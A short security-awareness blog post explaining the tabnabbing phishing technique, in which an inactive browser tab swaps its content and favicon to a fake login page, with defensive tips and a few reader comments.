Watch out for forged Tabs - Tabnabbing Phishing Attack
For those of you who haven't heard about Tabnabbing, its yet another form of phishing which seems to be simpler and more effective than the usual phishing attacks you would have heard of. An important thing about this attack is that it can't be detected easily, even a smart browser and a cautious web surfer can get easily fooled, leading to information theft.
What's Tabnabbing and How it works?
Suppose you are working with multiple tabs. One of your friend tweets about a cool pic, you visit the website, view the image and without closing the tab move to another. In the meantime, the script running on the page detects that the page is not in focus and change its content to either your bank login page or gmail, yahoo etc. along with the favicon too. So, the next time you visit the page, because of the favicon and the changed content you thing its your regular bank website which has logged you out due to an expired session and you try to login, giving away the credentials.
This is Tabnabbing.
If you haven't noticed, the URL still won't change but the webpage caught you by surprise, fooling you ultimately. A good thing is that even in this case, the usual method of "Alway Watch the URL" will work, but the user is pretty convinced with the favicon itself.
An was shown by Aza Raskin, its discoverer, where he uses Javascript to turn the webpage into a Gmail login page. Yes, turning script off(by using No-Script addon) will not let this happen but in a by researcher Aviv Raff, it seems that this can be done without using scripts too. His forged webpage reloads every 20 seconds and will turn into the phishing page(a gmail image) only when you move to another tab using a mouse and if you move with keyboard it will take 10 reloads.
Fix for Tabnabbing
As Aza Raskin suggests, is a good way to defend a user against such attacks. This attack has worked successfully on many major browsers, though the favicon haven't worked on Safari or Chrome. Although I even read a blog about , don't know how but I will still suggest you to please check the URL before signing in or use something like the Firefox Account Manager.
3 Comments
then suppose you use Piro's tab managing extension in delightful tree format in subdomain priority mode. Then suppose colorizing extensions begin to play well with other extensions -- assuming mozilla ever bothers to design an extensions MANAGER.
Suppose you have the good sense to NOT-use the interwebs with a user with admin rights.
Suppose further you are your own man in the middle to foil web fingerprinting.
Suppose you have one browser profile for using less untrusted sites and a different profile for yet unseen obviously untrusted sites itself obviously locked down appropriately (tighter).
What a world it would be [sing along]
Why does a google fanboi like the article author care about privacy? Shovel your digitized self into google with as many shiny products as they give away for 'free'! hurry.
greasemonkey: show tab url in title bar
d'oh
how well does tabspoofing work against extensions that manage site authentication?
hmm
Post new comment